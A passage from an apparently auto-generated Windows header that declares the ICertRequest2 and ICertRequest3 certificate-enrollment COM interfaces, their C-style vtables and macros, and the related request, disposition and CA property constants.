            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *Submit )( 
            __RPC__in ICertRequest2 * This,
            /* [in] */ LONG Flags,
            /* [in] */ __RPC__in const BSTR strRequest,
            /* [in] */ __RPC__in const BSTR strAttributes,
            /* [in] */ __RPC__in const BSTR strConfig,
            /* [retval][out] */ __RPC__out LONG *pDisposition);
        
        HRESULT ( STDMETHODCALLTYPE *RetrievePending )( 
            __RPC__in ICertRequest2 * This,
            /* [in] */ LONG RequestId,
            /* [in] */ __RPC__in const BSTR strConfig,
            /* [retval][out] */ __RPC__out LONG *pDisposition);
        
        HRESULT ( STDMETHODCALLTYPE *GetLastStatus )( 
            __RPC__in ICertRequest2 * This,
            /* [retval][out] */ __RPC__out LONG *pStatus);
        
        HRESULT ( STDMETHODCALLTYPE *GetRequestId )( 
            __RPC__in ICertRequest2 * This,
            /* [retval][out] */ __RPC__out LONG *pRequestId);
        
        HRESULT ( STDMETHODCALLTYPE *GetDispositionMessage )( 
            __RPC__in ICertRequest2 * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pstrDispositionMessage);
        
        HRESULT ( STDMETHODCALLTYPE *GetCACertificate )( 
            __RPC__in ICertRequest2 * This,
            /* [in] */ LONG fExchangeCertificate,
            /* [in] */ __RPC__in const BSTR strConfig,
            /* [in] */ LONG Flags,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pstrCertificate);
        
        HRESULT ( STDMETHODCALLTYPE *GetCertificate )( 
            __RPC__in ICertRequest2 * This,
            /* [in] */ LONG Flags,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pstrCertificate);
        
        HRESULT ( STDMETHODCALLTYPE *GetIssuedCertificate )( 
            __RPC__in ICertRequest2 * This,
            /* [in] */ __RPC__in const BSTR strConfig,
            /* [in] */ LONG RequestId,
            /* [in] */ __RPC__in const BSTR strSerialNumber,
            /* [retval][out] */ __RPC__out LONG *pDisposition);
        
        HRESULT ( STDMETHODCALLTYPE *GetErrorMessageText )( 
            __RPC__in ICertRequest2 * This,
            /* [in] */ LONG hrMessage,
            /* [in] */ LONG Flags,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pstrErrorMessageText);
        
        HRESULT ( STDMETHODCALLTYPE *GetCAProperty )( 
            __RPC__in ICertRequest2 * This,
            /* [in] */ __RPC__in const BSTR strConfig,
            /* [in] */ LONG PropId,
            /* [in] */ LONG PropIndex,
            /* [in] */ LONG PropType,
            /* [in] */ LONG Flags,
            /* [retval][out] */ __RPC__out VARIANT *pvarPropertyValue);
        
        HRESULT ( STDMETHODCALLTYPE *GetCAPropertyFlags )( 
            __RPC__in ICertRequest2 * This,
            /* [in] */ __RPC__in const BSTR strConfig,
            /* [in] */ LONG PropId,
            /* [retval][out] */ __RPC__out LONG *pPropFlags);
        
        HRESULT ( STDMETHODCALLTYPE *GetCAPropertyDisplayName )( 
            __RPC__in ICertRequest2 * This,
            /* [in] */ __RPC__in const BSTR strConfig,
            /* [in] */ LONG PropId,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pstrDisplayName);
        
        HRESULT ( STDMETHODCALLTYPE *GetFullResponseProperty )( 
            __RPC__in ICertRequest2 * This,
            /* [in] */ LONG PropId,
            /* [in] */ LONG PropIndex,
            /* [in] */ LONG PropType,
            /* [in] */ LONG Flags,
            /* [retval][out] */ __RPC__out VARIANT *pvarPropertyValue);
        
        END_INTERFACE
    } ICertRequest2Vtbl;

    interface ICertRequest2
    {
        CONST_VTBL struct ICertRequest2Vtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define ICertRequest2_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define ICertRequest2_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define ICertRequest2_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define ICertRequest2_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define ICertRequest2_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define ICertRequest2_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define ICertRequest2_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define ICertRequest2_Submit(This,Flags,strRequest,strAttributes,strConfig,pDisposition)	\
    ( (This)->lpVtbl -> Submit(This,Flags,strRequest,strAttributes,strConfig,pDisposition) ) 

#define ICertRequest2_RetrievePending(This,RequestId,strConfig,pDisposition)	\
    ( (This)->lpVtbl -> RetrievePending(This,RequestId,strConfig,pDisposition) ) 

#define ICertRequest2_GetLastStatus(This,pStatus)	\
    ( (This)->lpVtbl -> GetLastStatus(This,pStatus) ) 

#define ICertRequest2_GetRequestId(This,pRequestId)	\
    ( (This)->lpVtbl -> GetRequestId(This,pRequestId) ) 

#define ICertRequest2_GetDispositionMessage(This,pstrDispositionMessage)	\
    ( (This)->lpVtbl -> GetDispositionMessage(This,pstrDispositionMessage) ) 

#define ICertRequest2_GetCACertificate(This,fExchangeCertificate,strConfig,Flags,pstrCertificate)	\
    ( (This)->lpVtbl -> GetCACertificate(This,fExchangeCertificate,strConfig,Flags,pstrCertificate) ) 

#define ICertRequest2_GetCertificate(This,Flags,pstrCertificate)	\
    ( (This)->lpVtbl -> GetCertificate(This,Flags,pstrCertificate) ) 


#define ICertRequest2_GetIssuedCertificate(This,strConfig,RequestId,strSerialNumber,pDisposition)	\
    ( (This)->lpVtbl -> GetIssuedCertificate(This,strConfig,RequestId,strSerialNumber,pDisposition) ) 

#define ICertRequest2_GetErrorMessageText(This,hrMessage,Flags,pstrErrorMessageText)	\
    ( (This)->lpVtbl -> GetErrorMessageText(This,hrMessage,Flags,pstrErrorMessageText) ) 

#define ICertRequest2_GetCAProperty(This,strConfig,PropId,PropIndex,PropType,Flags,pvarPropertyValue)	\
    ( (This)->lpVtbl -> GetCAProperty(This,strConfig,PropId,PropIndex,PropType,Flags,pvarPropertyValue) ) 

#define ICertRequest2_GetCAPropertyFlags(This,strConfig,PropId,pPropFlags)	\
    ( (This)->lpVtbl -> GetCAPropertyFlags(This,strConfig,PropId,pPropFlags) ) 

#define ICertRequest2_GetCAPropertyDisplayName(This,strConfig,PropId,pstrDisplayName)	\
    ( (This)->lpVtbl -> GetCAPropertyDisplayName(This,strConfig,PropId,pstrDisplayName) ) 

#define ICertRequest2_GetFullResponseProperty(This,PropId,PropIndex,PropType,Flags,pvarPropertyValue)	\
    ( (This)->lpVtbl -> GetFullResponseProperty(This,PropId,PropIndex,PropType,Flags,pvarPropertyValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __ICertRequest2_INTERFACE_DEFINED__ */


/* interface __MIDL_itf_certcli_0000_0005 */
/* [local] */ 

typedef 
enum X509EnrollmentAuthFlags
    {
        X509AuthNone	= 0,
        X509AuthAnonymous	= 1,
        X509AuthKerberos	= 2,
        X509AuthUsername	= 4,
        X509AuthCertificate	= 8
    } 	X509EnrollmentAuthFlags;



extern RPC_IF_HANDLE __MIDL_itf_certcli_0000_0005_v0_0_c_ifspec;
extern RPC_IF_HANDLE __MIDL_itf_certcli_0000_0005_v0_0_s_ifspec;

#ifndef __ICertRequest3_INTERFACE_DEFINED__
#define __ICertRequest3_INTERFACE_DEFINED__

/* interface ICertRequest3 */
/* [unique][helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_ICertRequest3;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("AFC8F92B-33A2-4861-BF36-2933B7CD67B3")
    ICertRequest3 : public ICertRequest2
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE SetCredential( 
            /* [in] */ LONG hWnd,
            /* [in] */ X509EnrollmentAuthFlags AuthType,
            /* [in] */ __RPC__in BSTR strCredential,
            /* [in] */ __RPC__in BSTR strPassword) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE GetRequestIdString( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pstrRequestId) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE GetIssuedCertificate2( 
            /* [in] */ __RPC__in BSTR strConfig,
            /* [in] */ __RPC__in BSTR strRequestId,
            /* [in] */ __RPC__in BSTR strSerialNumber,
            /* [retval][out] */ __RPC__out LONG *pDisposition) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE GetRefreshPolicy( 
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct ICertRequest3Vtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in ICertRequest3 * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in ICertRequest3 * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in ICertRequest3 * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in ICertRequest3 * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in ICertRequest3 * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in ICertRequest3 * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            ICertRequest3 * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *Submit )( 
            __RPC__in ICertRequest3 * This,
            /* [in] */ LONG Flags,
            /* [in] */ __RPC__in const BSTR strRequest,
            /* [in] */ __RPC__in const BSTR strAttributes,
            /* [in] */ __RPC__in const BSTR strConfig,
            /* [retval][out] */ __RPC__out LONG *pDisposition);
        
        HRESULT ( STDMETHODCALLTYPE *RetrievePending )( 
            __RPC__in ICertRequest3 * This,
            /* [in] */ LONG RequestId,
            /* [in] */ __RPC__in const BSTR strConfig,
            /* [retval][out] */ __RPC__out LONG *pDisposition);
        
        HRESULT ( STDMETHODCALLTYPE *GetLastStatus )( 
            __RPC__in ICertRequest3 * This,
            /* [retval][out] */ __RPC__out LONG *pStatus);
        
        HRESULT ( STDMETHODCALLTYPE *GetRequestId )( 
            __RPC__in ICertRequest3 * This,
            /* [retval][out] */ __RPC__out LONG *pRequestId);
        
        HRESULT ( STDMETHODCALLTYPE *GetDispositionMessage )( 
            __RPC__in ICertRequest3 * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pstrDispositionMessage);
        
        HRESULT ( STDMETHODCALLTYPE *GetCACertificate )( 
            __RPC__in ICertRequest3 * This,
            /* [in] */ LONG fExchangeCertificate,
            /* [in] */ __RPC__in const BSTR strConfig,
            /* [in] */ LONG Flags,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pstrCertificate);
        
        HRESULT ( STDMETHODCALLTYPE *GetCertificate )( 
            __RPC__in ICertRequest3 * This,
            /* [in] */ LONG Flags,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pstrCertificate);
        
        HRESULT ( STDMETHODCALLTYPE *GetIssuedCertificate )( 
            __RPC__in ICertRequest3 * This,
            /* [in] */ __RPC__in const BSTR strConfig,
            /* [in] */ LONG RequestId,
            /* [in] */ __RPC__in const BSTR strSerialNumber,
            /* [retval][out] */ __RPC__out LONG *pDisposition);
        
        HRESULT ( STDMETHODCALLTYPE *GetErrorMessageText )( 
            __RPC__in ICertRequest3 * This,
            /* [in] */ LONG hrMessage,
            /* [in] */ LONG Flags,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pstrErrorMessageText);
        
        HRESULT ( STDMETHODCALLTYPE *GetCAProperty )( 
            __RPC__in ICertRequest3 * This,
            /* [in] */ __RPC__in const BSTR strConfig,
            /* [in] */ LONG PropId,
            /* [in] */ LONG PropIndex,
            /* [in] */ LONG PropType,
            /* [in] */ LONG Flags,
            /* [retval][out] */ __RPC__out VARIANT *pvarPropertyValue);
        
        HRESULT ( STDMETHODCALLTYPE *GetCAPropertyFlags )( 
            __RPC__in ICertRequest3 * This,
            /* [in] */ __RPC__in const BSTR strConfig,
            /* [in] */ LONG PropId,
            /* [retval][out] */ __RPC__out LONG *pPropFlags);
        
        HRESULT ( STDMETHODCALLTYPE *GetCAPropertyDisplayName )( 
            __RPC__in ICertRequest3 * This,
            /* [in] */ __RPC__in const BSTR strConfig,
            /* [in] */ LONG PropId,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pstrDisplayName);
        
        HRESULT ( STDMETHODCALLTYPE *GetFullResponseProperty )( 
            __RPC__in ICertRequest3 * This,
            /* [in] */ LONG PropId,
            /* [in] */ LONG PropIndex,
            /* [in] */ LONG PropType,
            /* [in] */ LONG Flags,
            /* [retval][out] */ __RPC__out VARIANT *pvarPropertyValue);
        
        HRESULT ( STDMETHODCALLTYPE *SetCredential )( 
            __RPC__in ICertRequest3 * This,
            /* [in] */ LONG hWnd,
            /* [in] */ X509EnrollmentAuthFlags AuthType,
            /* [in] */ __RPC__in BSTR strCredential,
            /* [in] */ __RPC__in BSTR strPassword);
        
        HRESULT ( STDMETHODCALLTYPE *GetRequestIdString )( 
            __RPC__in ICertRequest3 * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pstrRequestId);
        
        HRESULT ( STDMETHODCALLTYPE *GetIssuedCertificate2 )( 
            __RPC__in ICertRequest3 * This,
            /* [in] */ __RPC__in BSTR strConfig,
            /* [in] */ __RPC__in BSTR strRequestId,
            /* [in] */ __RPC__in BSTR strSerialNumber,
            /* [retval][out] */ __RPC__out LONG *pDisposition);
        
        HRESULT ( STDMETHODCALLTYPE *GetRefreshPolicy )( 
            __RPC__in ICertRequest3 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        END_INTERFACE
    } ICertRequest3Vtbl;

    interface ICertRequest3
    {
        CONST_VTBL struct ICertRequest3Vtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define ICertRequest3_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define ICertRequest3_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define ICertRequest3_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define ICertRequest3_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define ICertRequest3_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define ICertRequest3_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define ICertRequest3_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define ICertRequest3_Submit(This,Flags,strRequest,strAttributes,strConfig,pDisposition)	\
    ( (This)->lpVtbl -> Submit(This,Flags,strRequest,strAttributes,strConfig,pDisposition) ) 

#define ICertRequest3_RetrievePending(This,RequestId,strConfig,pDisposition)	\
    ( (This)->lpVtbl -> RetrievePending(This,RequestId,strConfig,pDisposition) ) 

#define ICertRequest3_GetLastStatus(This,pStatus)	\
    ( (This)->lpVtbl -> GetLastStatus(This,pStatus) ) 

#define ICertRequest3_GetRequestId(This,pRequestId)	\
    ( (This)->lpVtbl -> GetRequestId(This,pRequestId) ) 

#define ICertRequest3_GetDispositionMessage(This,pstrDispositionMessage)	\
    ( (This)->lpVtbl -> GetDispositionMessage(This,pstrDispositionMessage) ) 

#define ICertRequest3_GetCACertificate(This,fExchangeCertificate,strConfig,Flags,pstrCertificate)	\
    ( (This)->lpVtbl -> GetCACertificate(This,fExchangeCertificate,strConfig,Flags,pstrCertificate) ) 

#define ICertRequest3_GetCertificate(This,Flags,pstrCertificate)	\
    ( (This)->lpVtbl -> GetCertificate(This,Flags,pstrCertificate) ) 


#define ICertRequest3_GetIssuedCertificate(This,strConfig,RequestId,strSerialNumber,pDisposition)	\
    ( (This)->lpVtbl -> GetIssuedCertificate(This,strConfig,RequestId,strSerialNumber,pDisposition) ) 

#define ICertRequest3_GetErrorMessageText(This,hrMessage,Flags,pstrErrorMessageText)	\
    ( (This)->lpVtbl -> GetErrorMessageText(This,hrMessage,Flags,pstrErrorMessageText) ) 

#define ICertRequest3_GetCAProperty(This,strConfig,PropId,PropIndex,PropType,Flags,pvarPropertyValue)	\
    ( (This)->lpVtbl -> GetCAProperty(This,strConfig,PropId,PropIndex,PropType,Flags,pvarPropertyValue) ) 

#define ICertRequest3_GetCAPropertyFlags(This,strConfig,PropId,pPropFlags)	\
    ( (This)->lpVtbl -> GetCAPropertyFlags(This,strConfig,PropId,pPropFlags) ) 

#define ICertRequest3_GetCAPropertyDisplayName(This,strConfig,PropId,pstrDisplayName)	\
    ( (This)->lpVtbl -> GetCAPropertyDisplayName(This,strConfig,PropId,pstrDisplayName) ) 

#define ICertRequest3_GetFullResponseProperty(This,PropId,PropIndex,PropType,Flags,pvarPropertyValue)	\
    ( (This)->lpVtbl -> GetFullResponseProperty(This,PropId,PropIndex,PropType,Flags,pvarPropertyValue) ) 


#define ICertRequest3_SetCredential(This,hWnd,AuthType,strCredential,strPassword)	\
    ( (This)->lpVtbl -> SetCredential(This,hWnd,AuthType,strCredential,strPassword) ) 

#define ICertRequest3_GetRequestIdString(This,pstrRequestId)	\
    ( (This)->lpVtbl -> GetRequestIdString(This,pstrRequestId) ) 

#define ICertRequest3_GetIssuedCertificate2(This,strConfig,strRequestId,strSerialNumber,pDisposition)	\
    ( (This)->lpVtbl -> GetIssuedCertificate2(This,strConfig,strRequestId,strSerialNumber,pDisposition) ) 

#define ICertRequest3_GetRefreshPolicy(This,pValue)	\
    ( (This)->lpVtbl -> GetRefreshPolicy(This,pValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __ICertRequest3_INTERFACE_DEFINED__ */



#ifndef __CERTCLILib_LIBRARY_DEFINED__
#define __CERTCLILib_LIBRARY_DEFINED__

/* library CERTCLILib */
/* [helpstring][version][uuid] */ 

#define wszCONFIG_COMMONNAME 		L"CommonName"
#define wszCONFIG_ORGUNIT 		L"OrgUnit"
#define wszCONFIG_ORGANIZATION 		L"Organization"
#define wszCONFIG_LOCALITY 		L"Locality"
#define wszCONFIG_STATE			L"State"
#define wszCONFIG_COUNTRY		L"Country"
#define wszCONFIG_CONFIG		L"Config"
#define wszCONFIG_EXCHANGECERTIFICATE	L"ExchangeCertificate"
#define wszCONFIG_SIGNATURECERTIFICATE	L"SignatureCertificate"
#define wszCONFIG_DESCRIPTION		L"Description"
#define wszCONFIG_COMMENT		L"Comment" // obsolete: use Description
#define wszCONFIG_SERVER 		L"Server"
#define wszCONFIG_AUTHORITY 		L"Authority"
#define wszCONFIG_SANITIZEDNAME		L"SanitizedName"
#define wszCONFIG_SHORTNAME		L"ShortName"
#define wszCONFIG_SANITIZEDSHORTNAME	L"SanitizedShortName"
#define wszCONFIG_FLAGS			L"Flags"
#define wszCONFIG_WEBENROLLMENTSERVERS	L"WebEnrollmentServers"
#define	CAIF_DSENTRY	( 0x1 )

#define	CAIF_SHAREDFOLDERENTRY	( 0x2 )

#define	CAIF_REGISTRY	( 0x4 )

#define	CAIF_LOCAL	( 0x8 )

#define	CAIF_REGISTRYPARENT	( 0x10 )

#define	CR_IN_BASE64HEADER	( 0 )

#define	CR_IN_BASE64	( 0x1 )

#define	CR_IN_BINARY	( 0x2 )

#define	CR_IN_ENCODEANY	( 0xff )

#define	CR_IN_ENCODEMASK	( 0xff )

#define	CR_IN_FORMATANY	( 0 )

#define	CR_IN_PKCS10	( 0x100 )

#define	CR_IN_KEYGEN	( 0x200 )

#define	CR_IN_PKCS7	( 0x300 )

#define	CR_IN_CMC	( 0x400 )

#define	CR_IN_CHALLENGERESPONSE	( 0x500 )

#define	CR_IN_FORMATMASK	( 0xff00 )

#define	CR_IN_SCEP	( 0x10000 )

#define	CR_IN_RPC	( 0x20000 )

#define	CR_IN_HTTP	( 0x30000 )

#define	CR_IN_FULLRESPONSE	( 0x40000 )

#define	CR_IN_CRLS	( 0x80000 )

#define	CR_IN_MACHINE	( 0x100000 )

#define	CR_IN_ROBO	( 0x200000 )

#define	CR_IN_CLIENTIDNONE	( 0x400000 )

#define	CR_IN_CONNECTONLY	( 0x800000 )

#define	CR_IN_RETURNCHALLENGE	( 0x1000000 )

#define	CR_IN_SCEPPOST	( 0x2000000 )

#define	CR_IN_CLIENTFLAGSMASK	( ( ( ( ( ( CR_IN_ENCODEMASK | CR_IN_RPC )  | CR_IN_MACHINE )  | CR_IN_CLIENTIDNONE )  | CR_IN_CONNECTONLY )  | CR_IN_RETURNCHALLENGE )  )

#define	CC_DEFAULTCONFIG	( 0 )

#define	CC_UIPICKCONFIG	( 0x1 )

#define	CC_FIRSTCONFIG	( 0x2 )

#define	CC_LOCALCONFIG	( 0x3 )

#define	CC_LOCALACTIVECONFIG	( 0x4 )

#define	CC_UIPICKCONFIGSKIPLOCALCA	( 0x5 )

#define	CR_DISP_INCOMPLETE	( 0 )

#define	CR_DISP_ERROR	( 0x1 )

#define	CR_DISP_DENIED	( 0x2 )

#define	CR_DISP_ISSUED	( 0x3 )

#define	CR_DISP_ISSUED_OUT_OF_BAND	( 0x4 )

#define	CR_DISP_UNDER_SUBMISSION	( 0x5 )

#define	CR_DISP_REVOKED	( 0x6 )

#define	CR_OUT_BASE64HEADER	( 0 )

#define	CR_OUT_BASE64	( 0x1 )

#define	CR_OUT_BINARY	( 0x2 )

#define	CR_OUT_BASE64REQUESTHEADER	( 0x3 )

#define	CR_OUT_HEX	( 0x4 )

#define	CR_OUT_HEXASCII	( 0x5 )

#define	CR_OUT_BASE64X509CRLHEADER	( 0x9 )

#define	CR_OUT_HEXADDR	( 0xa )

#define	CR_OUT_HEXASCIIADDR	( 0xb )

#define	CR_OUT_HEXRAW	( 0xc )

#define	CR_OUT_ENCODEMASK	( 0xff )

#define	CR_OUT_CHAIN	( 0x100 )

#define	CR_OUT_CRLS	( 0x200 )

#define	CR_OUT_NOCRLF	( 0x40000000 )

#define	CR_OUT_NOCR	( 0x80000000 )

#define	CR_GEMT_DEFAULT	( 0 )

#define	CR_GEMT_HRESULT_STRING	( 0x1 )

#define	CR_GEMT_HTTP_ERROR	( 0x2 )

#define CR_PROP_NONE               0  // Invalid
#define CR_PROP_FILEVERSION        1  // String
#define CR_PROP_PRODUCTVERSION     2  // String
#define CR_PROP_EXITCOUNT          3  // Long

// CR_PROP_EXITCOUNT Elements:
#define CR_PROP_EXITDESCRIPTION    4  // String, Indexed

#define CR_PROP_POLICYDESCRIPTION  5  // String
#define CR_PROP_CANAME             6  // String
#define CR_PROP_SANITIZEDCANAME    7  // String
#define CR_PROP_SHAREDFOLDER       8  // String
#define CR_PROP_PARENTCA           9  // String
#define CR_PROP_CATYPE            10  // Long
#define CR_PROP_CASIGCERTCOUNT    11  // Long

// CR_PROP_CASIGCERTCOUNT Elements:
#define CR_PROP_CASIGCERT         12  // Binary, Indexed

// CR_PROP_CASIGCERTCOUNT Elements:
#define CR_PROP_CASIGCERTCHAIN    13  // Binary, Indexed

#define CR_PROP_CAXCHGCERTCOUNT   14  // Long

// CR_PROP_CAXCHGCERTCOUNT Elements:
#define CR_PROP_CAXCHGCERT        15  // Binary, Indexed

// CR_PROP_CAXCHGCERTCOUNT Elements:
#define CR_PROP_CAXCHGCERTCHAIN   16  // Binary, Indexed

// CR_PROP_CASIGCERTCOUNT Elements:
// Fetch only if CR_PROP_CRLSTATE[i] == CA_DISP_VALID
// May also be available if CR_PROP_CRLSTATE[i] == CA_DISP_INVALID
#define CR_PROP_BASECRL           17  // Binary, Indexed

// CR_PROP_CASIGCERTCOUNT Elements:
// Fetch only if Delta CRLs enabled && CR_PROP_CRLSTATE[i] == CA_DISP_VALID
// May also be available if CR_PROP_CRLSTATE[i] == CA_DISP_INVALID
#define CR_PROP_DELTACRL          18  // Binary, Indexed

// CR_PROP_CASIGCERTCOUNT Elements:
#define CR_PROP_CACERTSTATE       19  // Long, Indexed

// CR_PROP_CASIGCERTCOUNT Elements:
#define CR_PROP_CRLSTATE          20  // Long, Indexed

#define CR_PROP_CAPROPIDMAX       21  // Long
#define CR_PROP_DNSNAME           22  // String
#define CR_PROP_ROLESEPARATIONENABLED 23 // Long
#define CR_PROP_KRACERTUSEDCOUNT  24  // Long
#define CR_PROP_KRACERTCOUNT      25  // Long

// CR_PROP_KRACERTCOUNT Elements:
#define CR_PROP_KRACERT           26  // Binary, Indexed

// CR_PROP_KRACERTCOUNT Elements:
#define CR_PROP_KRACERTSTATE      27  // Long, Indexed

#define CR_PROP_ADVANCEDSERVER    28  // Long
#define CR_PROP_TEMPLATES         29  // String

// CR_PROP_CASIGCERTCOUNT Elements:
// Fetch only if CR_PROP_CRLSTATE[i] == CA_DISP_VALID
#define CR_PROP_BASECRLPUBLISHSTATUS 30  // Long, Indexed

// CR_PROP_CASIGCERTCOUNT Elements:
// Fetch only if Delta CRLs enabled && CR_PROP_CRLSTATE[i] == CA_DISP_VALID
#define CR_PROP_DELTACRLPUBLISHSTATUS 31  // Long, Indexed

// CR_PROP_CASIGCERTCOUNT Elements:
#define CR_PROP_CASIGCERTCRLCHAIN 32  // Binary, Indexed

// CR_PROP_CAXCHGCERTCOUNT Elements:
#define CR_PROP_CAXCHGCERTCRLCHAIN 33 // Binary, Indexed

// CR_PROP_CASIGCERTCOUNT Elements:
#define CR_PROP_CACERTSTATUSCODE  34  // Long, Indexed

// CR_PROP_CASIGCERTCOUNT Elements:
#define CR_PROP_CAFORWARDCROSSCERT 35  // Binary, Indexed

// CR_PROP_CASIGCERTCOUNT Elements:
#define CR_PROP_CABACKWARDCROSSCERT 36  // Binary, Indexed

// CR_PROP_CASIGCERTCOUNT Elements:
#define CR_PROP_CAFORWARDCROSSCERTSTATE 37  // Long, Indexed

// CR_PROP_CASIGCERTCOUNT Elements:
#define CR_PROP_CABACKWARDCROSSCERTSTATE 38  // Long, Indexed

// CR_PROP_CASIGCERTCOUNT Elements:
#define CR_PROP_CACERTVERSION       39  // Long, Indexed
#define CR_PROP_SANITIZEDCASHORTNAME 40  // String

// CR_PROP_CERTCDPURLS Elements:
#define CR_PROP_CERTCDPURLS 41  // String, Indexed

// CR_PROP_CERTAIAURLS Elements:
#define CR_PROP_CERTAIAURLS 42  // String, Indexed

// CR_PROP_CERTAIAOCSPURLS Elements:
#define CR_PROP_CERTAIAOCSPURLS 43  // String, Indexed

// CR_PROP_LOCALENAME Elements:
#define CR_PROP_LOCALENAME 44  // String

// CR_PROP_SUBJECTTEMPLATE_OIDS Elements:
#define CR_PROP_SUBJECTTEMPLATE_OIDS 45  // String
#define CR_PROP_SCEPSERVERCERTS        1000  // Binary
#define CR_PROP_SCEPSERVERCAPABILITIES 1001  // String
#define CR_PROP_SCEPSERVERCERTSCHAIN   1002  // Binary
#define CR_PROP_SCEPMIN CR_PROP_SCEPSERVERCERTS
#define CR_PROP_SCEPMAX CR_PROP_SCEPSERVERCERTSCHAIN


#define FR_PROP_NONE                    0  // Invalid
#define FR_PROP_FULLRESPONSE            1  // Binary
#define FR_PROP_STATUSINFOCOUNT         2  // Long

// FR_PROP_STATUSINFOCOUNT Elements:
#define FR_PROP_BODYPARTSTRING          3  // String, Indexed

// FR_PROP_STATUSINFOCOUNT Elements:
#define FR_PROP_STATUS                  4  // Long, Indexed

// FR_PROP_STATUSINFOCOUNT Elements:
#define FR_PROP_STATUSSTRING            5  // String, Indexed

// FR_PROP_STATUSINFOCOUNT Elements:
#define FR_PROP_OTHERINFOCHOICE         6  // Long, Indexed

// FR_PROP_STATUSINFOCOUNT Elements:
#define FR_PROP_FAILINFO                7  // Long, Indexed

